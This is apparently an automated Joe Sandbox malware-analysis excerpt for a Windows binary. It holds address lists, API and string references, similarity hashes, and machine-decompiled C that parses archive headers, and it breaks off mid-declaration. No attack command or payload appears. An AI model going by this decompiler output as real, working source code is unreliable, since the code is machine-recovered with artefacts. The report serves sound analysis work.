0x00a5ecb4
0x00a5ecb9
0x00a5ecbc
0x00a5ecbe
0x00a5ecc6
0x00a5ecc8
0x00a5ecca
0x00a5eccf
0x00a5ecd2
0x00a5ecd8
0x00a5ecdb
0x00a5ecdd
0x00a5ecdd
0x00a5ecdd
0x00a5ecdd
0x00a5ecdb
0x00a5ece0
0x00a5ecec
0x00a5ecf2
0x00a5ecfa
0x00a5ecff
0x00a5ed00
0x00a5ed05
0x00a5ed05
0x00a5ed05
0x00a5ed05
0x00a5ed09
0x00a5ed09
0x00a5ed0c
0x00a5ed13
0x00a5ed20
0x00a5ec56
0x00a5ec56
0x00a5ec56
0x00a5ec5d
0x00a5ec5e
0x00a5ec5f
0x00a5ec60
0x00a5ec69
0x00a5ec6e
0x00a5ec7c
0x00a5ec7c
0x00a5ec54
0x00a5d95d

APIs

__floor_pentium4.LIBCMT ref: 00A5DA34
DeleteCriticalSection.KERNEL32(?,00A6C4E8,00000010,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 00A5ECEC
_free.LIBCMT ref: 00A5ECFA

Strings

1#INF, xrefs: 00A5EC41
1#IND, xrefs: 00A5EC2C
1#SNAN, xrefs: 00A5EC33
1#QNAN, xrefs: 00A5EC3A

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: CriticalDeleteSection__floor_pentium4_free
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 3598519632-2761157908
Opcode ID: f405a510c7d55e1ac98f9a8e326b85308e36ececf63ac05d55e83b78d0f726e9
Instruction ID: 0566afdd7a8fe390f8cb39870c42a31acd7e97368517baf69cdd00382dae17e6
Opcode Fuzzy Hash: f405a510c7d55e1ac98f9a8e326b85308e36ececf63ac05d55e83b78d0f726e9
Instruction Fuzzy Hash: C7C22972E046288FDB29CF289D407E9B7B5FB44316F1541EAD84DE7240E775AE898F40

Uniqueness

Uniqueness Score: -1.00%

Function 00A332F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E00A332F7(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				void* _t237;
				signed int _t240;
				void* _t246;
				unsigned int _t248;
				unsigned int _t252;
				void* _t253;
				signed int _t257;
				char _t269;
				signed int _t277;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t291;
				signed int _t292;
				signed int _t295;
				char _t302;
				signed char _t304;
				signed int _t319;
				signed int _t328;
				signed int _t329;
				signed int _t331;
				signed int _t335;
				signed int _t350;
				signed char _t352;
				unsigned int _t363;
				intOrPtr _t370;
				void* _t373;
				intOrPtr _t374;
				void* _t381;
				signed int _t383;
				void* _t384;
				signed int _t395;
				intOrPtr* _t399;
				signed int _t414;
				signed int _t423;
				char _t432;
				signed int _t433;
				signed int _t438;
				signed int _t442;
				intOrPtr _t450;
				unsigned int _t456;
				unsigned int _t459;
				signed int _t463;
				signed int _t471;
				signed int _t480;
				signed int _t485;
				signed int _t500;
				signed int _t502;
				signed char _t503;
				signed int _t504;
				unsigned int _t505;
				intOrPtr _t514;
				void* _t515;
				void* _t522;
				signed int _t525;
				void* _t526;
				signed int _t536;
				void* _t542;
				void* _t544;
				intOrPtr _t547;
				void* _t548;
				void* _t550;
				void* _t551;
				intOrPtr _t561;

				_t551 = _t550 - 0x68;
				E00A4EB78(0xa626be, _t548);
				E00A4EC50(0x2068);
				_t399 = __ecx;
				E00A3CB83(_t548 + 0x30, __ecx);
				 *(_t548 + 0x64) = 0;
				 *((intOrPtr*)(_t548 - 4)) = 0;
				if( *((intOrPtr*)(__ecx + 0x6cd4)) == 0) {
					L18:
					 *((char*)(_t548 + 0x6a)) = 0;
					L19:
					_push(7);
					_t237 = E00A3CD8A();
					__eflags = _t237 - 7;
					if(_t237 >= 7) {
						 *(_t399 + 0x220c) = 0;
						 *(_t399 + 0x21fc) = E00A3CBFB(_t548 + 0x30);
						_t536 = E00A3CD66(_t548 + 0x30, 4);
						_t240 = E00A3CCFB();
						__eflags = _t240 | _t500;
						if((_t240 | _t500) == 0) {
							L88:
							E00A320D7(_t399);
							L89:
							E00A315FB(_t548 + 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t548 - 0xc));
							return  *(_t548 + 0x64);
						}
						__eflags = _t536;
						if(_t536 == 0) {
							goto L88;
						}
						_t46 = _t536 + 4; // 0x4
						_t47 = _t536 - 3; // -3
						_t514 = _t46 + _t240;
						_t414 = _t47 + _t240;
						__eflags = _t414;
						if(_t414 < 0) {
							goto L88;
						}
						__eflags = _t514 - 7;
						if(_t514 < 7) {
							goto L88;
						}
						_push(_t414);
						E00A3CD8A();
						__eflags =  *(_t548 + 0x48) - _t514;
						if( *(_t548 + 0x48) < _t514) {
							goto L20;
						}
						_t246 = E00A3CCDB(_t548 + 0x30);
						 *(_t399 + 0x2200) = E00A3CCFB();
						_t248 = E00A3CCFB();
						 *(_t399 + 0x2204) = _t248;
						 *((intOrPtr*)(_t399 + 0x2208)) = _t514;
						_t515 = _t399 + 0x21fc;
						 *(_t399 + 0x220c) = _t248 >> 0x00000002 & 0x00000001;
						__eflags =  *_t515 - _t246;
						 *(_t399 + 0x21f4) =  *(_t399 + 0x2200);
						_t60 = _t548 + 0x6b;
						 *_t60 =  *_t515 != _t246;
						__eflags =  *_t60;
						if( *_t60 == 0) {
							L29:
							_t252 = 0;
							__eflags =  *(_t399 + 0x2204) & 0x00000001;
							 *(_t548 + 0x58) = 0;
							 *(_t548 + 0x54) = 0;
							if(( *(_t399 + 0x2204) & 0x00000001) == 0) {
								L33:
								__eflags =  *(_t399 + 0x2204) & 0x00000002;
								_t539 = _t252;
								 *(_t548 + 0x60) = _t252;
								 *(_t548 + 0x5c) = _t252;
								if(( *(_t399 + 0x2204) & 0x00000002) != 0) {
									_t363 = E00A3CCFB();
									_t539 = _t363;
									 *(_t548 + 0x60) = _t363;
									 *(_t548 + 0x5c) = _t500;
								}
								_t253 = E00A31983(_t399,  *((intOrPtr*)(_t399 + 0x2208)));
								asm("adc ecx, edx");
								 *((intOrPtr*)(_t399 + 0x6cc0)) = E00A33EFB(_t253 +  *((intOrPtr*)(_t399 + 0x6cb8)),  *((intOrPtr*)(_t399 + 0x6cbc)), _t539,  *(_t548 + 0x5c), 0, 0);
								 *((intOrPtr*)(_t399 + 0x6cc4)) = 0;
								_t502 =  *(_t399 + 0x2200);
								_t257 = _t502 - 1;
								__eflags = _t257;
								if(_t257 == 0) {
									E00A3AD5E(_t399 + 0x2220);
									_t423 = 5;
									memcpy(_t399 + 0x2220, _t515, _t423 << 2);
									_t503 = E00A3CCFB();
									 *(_t399 + 0x6ccd) = _t503 & 1;
									 *(_t399 + 0x6ccc) = _t503 >> 0x00000002 & 1;
									_t432 = 1;
									 *((char*)(_t399 + 0x6cd2)) = 1;
									 *(_t399 + 0x6ccf) = _t503 >> 0x00000004 & 1;
									 *(_t399 + 0x6cd3) = _t503 >> 0x00000003 & 1;
									_t269 = 0;
									 *((char*)(_t399 + 0x6cd0)) = 0;
									__eflags = _t503 & 0x00000002;
									if((_t503 & 0x00000002) == 0) {
										_t504 = 0;
									} else {
										_t504 = E00A3CCFB();
										_t269 = 0;
										_t432 = 1;
									}
									 *(_t399 + 0x6cf0) = _t504;
									__eflags =  *(_t399 + 0x6ccd);
									if( *(_t399 + 0x6ccd) == 0) {
										L84:
										_t432 = _t269;
										goto L85;
									} else {
										__eflags = _t504;
										if(_t504 == 0) {
											L85:
											 *((char*)(_t399 + 0x6cd1)) = _t432;
											_t433 =  *(_t548 + 0x58);
											__eflags = _t433 |  *(_t548 + 0x54);
											if((_t433 |  *(_t548 + 0x54)) != 0) {
												E00A32210(_t399, _t504, _t548 + 0x30, _t433, _t399 + 0x2220);
											}
											goto L87;
										}
										goto L84;
									}
								} else {
									_t277 = _t257 - 1;
									__eflags = _t277;
									if(_t277 == 0) {
										L49:
										__eflags = _t502 - 2;
										_t121 = (0 | _t502 == 0x00000002) - 1; // -1
										_t522 = (_t121 & 0x00002350) + 0x2298 + _t399;
										 *(_t548 + 0x2c) = _t522;
										E00A3ACC4(_t522, 0);
										_t438 = 5;
										memcpy(_t522, _t399 + 0x21fc, _t438 << 2);
										_t542 =  *(_t548 + 0x2c);
										 *(_t548 + 0x64) =  *(_t399 + 0x2200);
										 *(_t542 + 0x1058) =  *(_t548 + 0x60);
										 *((char*)(_t542 + 0x10f9)) = 1;
										 *(_t542 + 0x105c) =  *(_t548 + 0x5c);
										 *(_t542 + 0x1094) = E00A3CCFB();
										 *(_t542 + 0x1060) = E00A3CCFB();
										_t289 =  *(_t542 + 0x1094) >> 0x00000003 & 0x00000001;
										__eflags = _t289;
										 *(_t542 + 0x1064) = _t502;
										 *(_t542 + 0x109a) = _t289;
										if(_t289 != 0) {
											 *(_t542 + 0x1060) = 0x7fffffff;
											 *(_t542 + 0x1064) = 0x7fffffff;
										}
										_t442 =  *(_t542 + 0x105c);
										_t525 =  *(_t542 + 0x1064);
										_t290 =  *(_t542 + 0x1058);
										_t505 =  *(_t542 + 0x1060);
										__eflags = _t442 - _t525;
										if(__eflags < 0) {
											L54:
											_t290 = _t505;
											_t442 = _t525;
											goto L55;
										} else {
											if(__eflags > 0) {
												L55:
												 *(_t542 + 0x106c) = _t442;
												 *(_t542 + 0x1068) = _t290;
												_t291 = E00A3CCFB();
												__eflags =  *(_t542 + 0x1094) & 0x00000002;
												 *((intOrPtr*)(_t542 + 0x24)) = _t291;
												if(( *(_t542 + 0x1094) & 0x00000002) != 0) {
													E00A4158F(_t542 + 0x1040, E00A3CBFB(_t548 + 0x30), 0);
												}
												 *(_t542 + 0x1070) =  *(_t542 + 0x1070) & 0x00000000;
												__eflags =  *(_t542 + 0x1094) & 0x00000004;
												if(( *(_t542 + 0x1094) & 0x00000004) != 0) {
													 *(_t542 + 0x1070) = 2;
													 *((intOrPtr*)(_t542 + 0x1074)) = E00A3CBFB(_t548 + 0x30);
												}
												 *(_t542 + 0x1100) =  *(_t542 + 0x1100) & 0x00000000;
												_t292 = E00A3CCFB();
												 *(_t548 + 0x60) = _t292;
												 *(_t542 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
												_t450 = (_t292 & 0x0000003f) + 0x32;
												 *((intOrPtr*)(_t542 + 0x1c)) = _t450;
												__eflags = _t450 - 0x32;
												if(_t450 != 0x32) {
													 *((intOrPtr*)(_t542 + 0x1c)) = 0x270f;
												}
												 *((char*)(_t542 + 0x18)) = E00A3CCFB();
												_t526 = E00A3CCFB();
												 *(_t542 + 0x10fc) = 2;
												_t295 =  *((intOrPtr*)(_t542 + 0x18));
												 *(_t542 + 0x10f8) =  *(_t399 + 0x2204) >> 0x00000006 & 1;
												__eflags = _t295 - 1;
												if(_t295 != 1) {
													__eflags = _t295;
													if(_t295 == 0) {
														_t178 = _t542 + 0x10fc;
														 *_t178 =  *(_t542 + 0x10fc) & 0x00000000;
														__eflags =  *_t178;
													}
												} else {
													 *(_t542 + 0x10fc) = 1;
												}
												_t456 =  *(_t542 + 8);
												 *(_t542 + 0x1098) = _t456 >> 0x00000003 & 1;
												 *(_t542 + 0x10fa) = _t456 >> 0x00000005 & 1;
												__eflags =  *(_t548 + 0x64) - 2;
												_t459 =  *(_t548 + 0x60);
												 *(_t542 + 0x1099) = _t456 >> 0x00000004 & 1;
												if( *(_t548 + 0x64) != 2) {
													L68:
													_t302 = 0;
													__eflags = 0;
													goto L69;
												} else {
													__eflags = _t459 & 0x00000040;
													if((_t459 & 0x00000040) == 0) {
														goto L68;
													}
													_t302 = 1;
													L69:
													 *((char*)(_t542 + 0x10f0)) = _t302;
													_t304 =  *(_t542 + 0x1094) & 1;
													 *(_t542 + 0x10f1) = _t304;
													_t509 = 0x20000 << (_t459 >> 0x0000000a & 0x0000000f);
													asm("sbb eax, eax");
													 *(_t542 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t459 >> 0x0000000a & 0x0000000f);
													asm("sbb eax, eax");
													 *(_t542 + 0x109c) =  ~( *(_t542 + 0x109b) & 0x000000ff) & 0x00000005;
													__eflags = _t526 - 0x1fff;
													if(_t526 >= 0x1fff) {
														_t526 = 0x1fff;
													}
													E00A3CC5D(_t548 + 0x30, _t548 - 0x2074, _t526);
													 *((char*)(_t548 + _t526 - 0x2074)) = 0;
													_push(0x800);
													_t527 = _t542 + 0x28;
													_push(_t542 + 0x28);
													_push(_t548 - 0x2074);
													E00A41C3B();
													_t463 =  *(_t548 + 0x58);
													_t318 = _t463 |  *(_t548 + 0x54);
													__eflags = _t463 |  *(_t548 + 0x54);
													if((_t463 |  *(_t548 + 0x54)) != 0) {
														_t318 = E00A32210(_t399, _t509, _t548 + 0x30, _t463, _t542);
													}
													__eflags =  *(_t548 + 0x64) - 2;
													if( *(_t548 + 0x64) != 2) {
														_t319 = E00A53E49(_t318, _t527, L"CMT");
														__eflags = _t319;
														if(_t319 == 0) {
															 *((char*)(_t399 + 0x6cce)) = 1;
														}
													} else {
														E00A32134(_t399, _t542);
													}
													__eflags =  *(_t548 + 0x6b);
													if(__eflags != 0) {
														E00A32021(__eflags, 0x1c, _t399 + 0x32, _t527);
													}
													L87:
													 *(_t548 + 0x64) =  *(_t548 + 0x48);
													goto L89;
												}
											}
											__eflags = _t290 - _t505;
											if(_t290 > _t505) {
												goto L55;
											}
											goto L54;
										}
									}
									_t328 = _t277 - 1;
									__eflags = _t328;
									if(_t328 == 0) {
										goto L49;
									}
									_t329 = _t328 - 1;
									__eflags = _t329;
									if(_t329 == 0) {
										_t471 = 5;
										memcpy(_t399 + 0x2260, _t399 + 0x21fc, _t471 << 2);
										_t331 = E00A3CCFB();
										__eflags = _t331;
										if(_t331 == 0) {
											 *(_t399 + 0x2274) = E00A3CCFB() & 0x00000001;
											_t335 = E00A3CBAF(_t548 + 0x30) & 0x000000ff;
											 *(_t399 + 0x2278) = _t335;
											__eflags = _t335 - 0x18;
											if(_t335 <= 0x18) {
												E00A3CC5D(_t548 + 0x30, _t399 + 0x227c, 0x10);
												__eflags =  *(_t399 + 0x2274);
												if( *(_t399 + 0x2274) != 0) {
													_t544 = _t399 + 0x228c;
													E00A3CC5D(_t548 + 0x30, _t544, 8);
													E00A3CC5D(_t548 + 0x30, _t548 + 0x64, 4);
													E00A40016(_t548 - 0x74);
													_push(8);
													_push(_t544);
													_push(_t548 - 0x74);
													E00A4005C();
													_push(_t548 + 8);
													E00A3FF33(_t548 - 0x74);
													_t350 = E00A50C4A(_t548 + 0x64, _t548 + 8, 4);
													asm("sbb al, al");
													_t352 =  ~_t350 + 1;
													__eflags = _t352;
													 *(_t399 + 0x2274) = _t352;
												}
												 *((char*)(_t399 + 0x6cd4)) = 1;
												goto L87;
											}
											_push(_t335);
											_push(L"hc%u");
											L43:
											_push(0x14);
											_push(_t548);
											E00A34092();
											E00A3403D(_t399, _t399 + 0x32, _t548);
											goto L89;
										}
										_push(_t331);
										_push(L"h%u");
										goto L43;
									}
									__eflags = _t329 == 1;
									if(_t329 == 1) {
										_t480 = 5;
										memcpy(_t399 + 0x45a8, _t399 + 0x21fc, _t480 << 2);
										 *(_t399 + 0x45c4) = E00A3CCFB() & 0x00000001;
										 *((short*)(_t399 + 0x45c6)) = 0;
										 *((char*)(_t399 + 0x45c5)) = 0;
									}
									goto L87;
								}
							}
							_t485 = E00A3CCFB();
							 *(_t548 + 0x54) = _t500;
							_t252 = 0;
							 *(_t548 + 0x58) = _t485;
							__eflags = _t500;
							if(__eflags < 0) {
								goto L33;
							}
							if(__eflags > 0) {
								goto L88;
							}
							__eflags = _t485 -  *((intOrPtr*)(_t399 + 0x2208));
							if(_t485 >=  *((intOrPtr*)(_t399 + 0x2208))) {
								goto L88;
							}
							goto L33;
						}
						E00A320D7(_t399);
						 *((char*)(_t399 + 0x6cdc)) = 1;
						E00A36D83(0xa71098, 3);
						__eflags =  *((char*)(_t548 + 0x6a));
						if(__eflags == 0) {
							goto L29;
						} else {
							E00A32021(__eflags, 4, _t399 + 0x32, _t399 + 0x32);
							L6:
							 *((char*)(_t399 + 0x6cdd)) = 1;
							goto L89;
						}
					}
					L20:
					E00A33FFC(_t399, _t500);
					goto L89;
				}
				_t500 =  *((intOrPtr*)(__ecx + 0x6cd8)) + 8;
				asm("adc eax, ecx");
				_t561 =  *((intOrPtr*)(__ecx + 0x6cbc));
				if(_t561 < 0 || _t561 <= 0 &&  *((intOrPtr*)(__ecx + 0x6cb8)) <= _t500) {
					goto L18;
				} else {
					_t370 =  *((intOrPtr*)(_t399 + 0x21d4));
					 *((char*)(_t548 + 0x6a)) = 1;
					_t563 =  *((intOrPtr*)(_t370 + 0x6127));
					if( *((intOrPtr*)(_t370 + 0x6127)) == 0) {
						 *0xa63278(_t548 + 0x18, 0x10);
						_t373 =  *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xc))))();
						__eflags = _t373 - 0x10;
						if(_t373 != 0x10) {
							goto L20;
						}
						_t374 =  *((intOrPtr*)(_t399 + 0x21d4));
						__eflags =  *((char*)(_t374 + 0x6124));
						if( *((char*)(_t374 + 0x6124)) != 0) {
							L10:
							 *(_t548 + 0x6b) = 1;
							L11:
							E00A33E6D(_t399);
							_t534 = _t399 + 0x227c;
							_t547 = _t399 + 0x1038;
							E00A3603A(_t547, 0, 5,  *((intOrPtr*)(_t399 + 0x21d4)) + 0x6024, _t399 + 0x227c, _t548 + 0x18,  *(_t399 + 0x2278), 0, _t548 + 0x28);
							__eflags =  *(_t399 + 0x2274);
							if( *(_t399 + 0x2274) == 0) {
								L16:
								 *((intOrPtr*)(_t548 + 0x50)) = _t547;
								goto L19;
							} else {
								_t381 = _t399 + 0x228c;
								while(1) {
									_t383 = E00A50C4A(_t548 + 0x28, _t381, 8);
									_t551 = _t551 + 0xc;
									__eflags = _t383;
									if(_t383 == 0) {
										goto L16;
									}
									__eflags =  *(_t548 + 0x6b);
									_t384 = _t399 + 0x32;
									_push(_t384);
									_push(_t384);
									if(__eflags != 0) {
										_push(6);
										E00A32021(__eflags);
										 *((char*)(_t399 + 0x6cdd)) = 1;
										E00A36D83(0xa71098, 0xb);
										goto L89;
									}
									_push(0x83);
									E00A32021(__eflags);
									E00A3F279( *((intOrPtr*)(_t399 + 0x21d4)) + 0x6024);
									E00A33E6D(_t399);
									E00A3603A(_t547, 0, 5,  *((intOrPtr*)(_t399 + 0x21d4)) + 0x6024, _t534, _t548 + 0x18,  *(_t399 + 0x2278), 0, _t548 + 0x28);
									__eflags =  *(_t399 + 0x2274);
									_t381 = _t399 + 0x228c;
									if( *(_t399 + 0x2274) != 0) {
										continue;
									}
									goto L16;
								}
								goto L16;
							}
						}
						_t395 = E00A41B63();
						 *(_t548 + 0x6b) = 0;
						__eflags = _t395;
						if(_t395 == 0) {
							goto L11;
						}
						goto L10;
					} else {
						E00A3138B(_t563, 0x7f, _t399 + 0x32);
						goto L6;
					}
				}
			}

0x00a332f8
0x00a33300
0x00a3330a
0x00a33311
0x00a33318
0x00a3331f
0x00a33322
0x00a3332b
0x00a334a6
0x00a334a6
0x00a334a9
0x00a334a9
0x00a334ae
0x00a334b3
0x00a334b6
0x00a334c7
0x00a334d8
0x00a334e6
0x00a334e8
0x00a334ef
0x00a334f1
0x00a33b09
0x00a33b0b
0x00a33b10
0x00a33b13
0x00a33b21
0x00a33b2c
0x00a33b2c
0x00a334f7
0x00a334f9
0x00000000
0x00000000
0x00a334ff
0x00a33502
0x00a33505
0x00a33507
0x00a33507
0x00a33509
0x00000000
0x00000000
0x00a3350f
0x00a33512
0x00000000
0x00000000
0x00a33518
0x00a3351c
0x00a33521
0x00a33524
0x00000000
0x00000000
0x00a33529
0x00a3353b
0x00a33541
0x00a33546
0x00a33551
0x00a33557
0x00a3355d
0x00a33563
0x00a3356b
0x00a33571
0x00a33571
0x00a33571
0x00a33575
0x00a335a8
0x00a335a8
0x00a335aa
0x00a335b1
0x00a335b4
0x00a335b7
0x00a335e1
0x00a335e1
0x00a335e8
0x00a335ea
0x00a335ed
0x00a335f0
0x00a335f5
0x00a335fa
0x00a335fc
0x00a335ff
0x00a335ff
0x00a3360a
0x00a33622
0x00a3362c
0x00a33632
0x00a33638
0x00a33640
0x00a33640
0x00a33643
0x00a33a50
0x00a33a5f
0x00a33a60
0x00a33a6a
0x00a33a73
0x00a33a85
0x00a33a8d
0x00a33a90
0x00a33a96
0x00a33aa3
0x00a33aa9
0x00a33aab
0x00a33ab1
0x00a33ab4
0x00a33ac7
0x00a33ab6
0x00a33abe
0x00a33ac2
0x00a33ac4
0x00a33ac4
0x00a33ac9
0x00a33acf
0x00a33ad6
0x00a33adc
0x00a33adc
0x00000000
0x00a33ad8
0x00a33ad8
0x00a33ada
0x00a33ade
0x00a33ade
0x00a33ae4
0x00a33ae9
0x00a33aec
0x00a33afc
0x00a33afc
0x00000000
0x00a33aec
0x00000000
0x00a33ada
0x00a33649
0x00a33649
0x00a33649
0x00a3364c
0x00a33796
0x00a33798
0x00a337a0
0x00a337af
0x00a337b3
0x00a337b6
0x00a337bd
0x00a337c4
0x00a337cf
0x00a337d2
0x00a337d8
0x00a337e1
0x00a337e8
0x00a337f6
0x00a33801
0x00a33810
0x00a33810
0x00a33812
0x00a33818
0x00a3381e
0x00a33825
0x00a3382b
0x00a3382b
0x00a33831
0x00a33837
0x00a3383d
0x00a33843
0x00a33849
0x00a3384b
0x00a33853
0x00a33853
0x00a33855
0x00000000
0x00a3384d
0x00a3384d
0x00a33857
0x00a33857
0x00a33860
0x00a33866
0x00a3386b
0x00a33872
0x00a33875
0x00a33888
0x00a33888
0x00a3388d
0x00a33894
0x00a3389b
0x00a338a0
0x00a338af
0x00a338af
0x00a338b5
0x00a338bf
0x00a338c6
0x00a338cf
0x00a338d7
0x00a338da
0x00a338dd
0x00a338e0
0x00a338e2
0x00a338e2
0x00a338f4
0x00a33908
0x00a3390a
0x00a33914
0x00a33919
0x00a3391f
0x00a33921
0x00a3392b
0x00a3392d
0x00a3392f
0x00a3392f
0x00a3392f
0x00a3392f
0x00a33923
0x00a33923
0x00a33923
0x00a33936
0x00a33940
0x00a33952
0x00a33958
0x00a3395c
0x00a3395f
0x00a33965
0x00a33970
0x00a33970
0x00a33970
0x00000000
0x00a33967
0x00a33967
0x00a3396a
0x00000000
0x00000000
0x00a3396c
0x00a33972
0x00a33972
0x00a3397e
0x00a33983
0x00a33994
0x00a33998
0x00a3399e
0x00a339ad
0x00a339b2
0x00a339bd
0x00a339bf
0x00a339c1
0x00a339c1
0x00a339ce
0x00a339d3
0x00a339e1
0x00a339e6
0x00a339e9
0x00a339ea
0x00a339eb
0x00a339f0
0x00a339f5
0x00a339f5
0x00a339f8
0x00a33a02
0x00a33a02
0x00a33a07
0x00a33a0b
0x00a33a1d
0x00a33a24
0x00a33a26
0x00a33a28
0x00a33a28
0x00a33a0d
0x00a33a10
0x00a33a10
0x00a33a2f
0x00a33a33
0x00a33a40
0x00a33a40
0x00a33b01
0x00a33b04
0x00000000
0x00a33b04
0x00a33965
0x00a3384f
0x00a33851
0x00000000
0x00000000
0x00000000
0x00a33851
0x00a3384b
0x00a33652
0x00a33652
0x00a33655
0x00000000
0x00000000
0x00a3365b
0x00a3365b
0x00a3365e
0x00a336a0
0x00a336ad
0x00a336b2
0x00a336b7
0x00a336b9
0x00a336f0
0x00a336fb
0x00a336fe
0x00a33704
0x00a33707
0x00a3371d
0x00a33722
0x00a33729
0x00a3372d
0x00a33737
0x00a33745
0x00a3374e
0x00a33753
0x00a33755
0x00a33759
0x00a3375a
0x00a33762
0x00a33767
0x00a33776
0x00a33780
0x00a33782
0x00a33782
0x00a33784
0x00a33784
0x00a3378a
0x00000000
0x00a3378a
0x00a33709
0x00a3370a
0x00a336c1
0x00a336c4
0x00a336c6
0x00a336c7
0x00a336d9
0x00000000
0x00a336d9
0x00a336bb
0x00a336bc
0x00000000
0x00a336bc
0x00a33660
0x00a33663
0x00a3366b
0x00a33678
0x00a33684
0x00a3368c
0x00a33693
0x00a33693
0x00000000
0x00a33663
0x00a33643
0x00a335c1
0x00a335c3
0x00a335c6
0x00a335c8
0x00a335cb
0x00a335cd
0x00000000
0x00000000
0x00a335cf
0x00000000
0x00000000
0x00a335d5
0x00a335db
0x00000000
0x00000000
0x00000000
0x00a335db
0x00a33579
0x00a33585
0x00a3358c
0x00a33591
0x00a33595
0x00000000
0x00a33597
0x00a3359e
0x00a33375
0x00a33375
0x00000000
0x00a33375
0x00a33595
0x00a334b8
0x00a334ba
0x00000000
0x00a334ba
0x00a33339
0x00a3333c
0x00a3333e
0x00a33344
0x00000000
0x00a33358
0x00a33358
0x00a3335e
0x00a33362
0x00a33368
0x00a3338e
0x00a33396
0x00a33398
0x00a3339b
0x00000000
0x00000000
0x00a333a1
0x00a333a7
0x00a333ae
0x00a333bd
0x00a333bd
0x00a333c1
0x00a333c3
0x00a333df
0x00a333eb
0x00a333f7
0x00a333fc
0x00a33403
0x00a33482
0x00a33482
0x00000000
0x00a33405
0x00a33405
0x00a3340b
0x00a33412
0x00a33417
0x00a3341a
0x00a3341c
0x00000000
0x00000000
0x00a3341e
0x00a33422
0x00a33425
0x00a33426
0x00a33427
0x00a33487
0x00a33489
0x00a33495
0x00a3349c
0x00000000
0x00a3349c
0x00a33429
0x00a3342e
0x00a3343f
0x00a33446
0x00a3346e
0x00a33473
0x00a3347a
0x00a33480
0x00000000
0x00000000
0x00000000
0x00a33480
0x00000000
0x00a3340b
0x00a33403
0x00a333b0
0x00a333b5
0x00a333b9
0x00a333bb
0x00000000
0x00000000
0x00000000
0x00a3336a
0x00a33370
0x00000000
0x00a33370
0x00a33368

APIs

__EH_prolog.LIBCMT ref: 00A33300
_swprintf.LIBCMT ref: 00A336C7

Strings

hc%u, xrefs: 00A3370A
h%u, xrefs: 00A336BC
CMT, xrefs: 00A33A17

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: bc97458b3991be1fc82062d9e3320630aa20b757b4d5402884b61fb1d7a43f9b
Instruction ID: 1a5e6dd1d62789621d403bff4302d4f4d90f03d712de24bcb2f0eb320c251c84
Opcode Fuzzy Hash: bc97458b3991be1fc82062d9e3320630aa20b757b4d5402884b61fb1d7a43f9b
Instruction Fuzzy Hash: 8132E872514384AFDF18DF74C996BEA37A5AF15300F04447EFD8A9B282DB749A49CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00A3286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E00A3286B(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				unsigned int _t329;
				signed int _t334;
				void* _t335;
				void* _t337;
				signed int _t340;
				char _t354;
				signed short _t361;
				signed int _t364;
				signed int _t371;
				signed char _t374;
				signed char _t377;
				signed int _t378;
				signed int _t395;
				signed int _t396;
				signed int _t400;
				signed char _t413;
				intOrPtr _t414;
				char _t415;
				signed int _t418;
				signed int _t419;
				signed int _t424;
				signed int _t427;
				signed int _t432;
				signed short _t437;
				signed short _t442;
				unsigned int _t447;
				signed int _t450;
				signed int _t455;
				signed int _t469;
				void* _t470;
				void* _t478;
				signed char _t484;
				signed int _t488;
				signed int _t498;
				signed int _t501;
				signed int _t502;
				signed int _t503;
				intOrPtr* _t516;
				signed int _t520;
				signed int _t521;
				signed int _t533;
				signed int _t537;
				signed int _t539;
				unsigned int _t548;
				signed int _t550;
				signed int _t560;
				signed int _t562;
				signed int _t563;
				intOrPtr* _t585;
				void* _t593;
				signed int _t597;
				intOrPtr _t609;
				signed int _t612;
				signed int _t624;
				signed char _t628;
				void* _t639;
				signed char _t640;
				signed int _t643;
				unsigned int _t644;
				signed int _t647;
				signed int _t648;
				signed int _t650;
				signed int _t651;
				unsigned int _t653;
				signed int _t657;
				void* _t659;
				void* _t665;
				signed int _t668;
				signed int _t669;
				signed int _t670;
				signed int _t671;
				signed int _t672;
				void* _t673;
				signed int _t675;
				intOrPtr* _t676;
				signed int _t688;
				void* _t694;
				signed int _t695;
				signed int _t697;
				signed int _t699;
				signed int _t701;
				intOrPtr _t707;
